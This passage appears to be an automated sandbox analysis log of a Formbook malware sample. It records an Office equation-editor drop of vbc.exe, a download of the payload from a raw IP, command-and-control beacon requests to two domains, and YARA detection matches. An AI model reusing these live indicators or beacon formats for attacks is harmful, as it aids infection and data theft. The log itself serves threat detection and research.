            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000005.00000000.456132086.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpg
            Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
            Source: explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P&
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmpJump to behavior
            Source: unknownDNS traffic detected: queries for: www.mountfrenchlodge.net
            Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.199.153Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.mountfrenchlodge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.cuteprofessionalscrubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
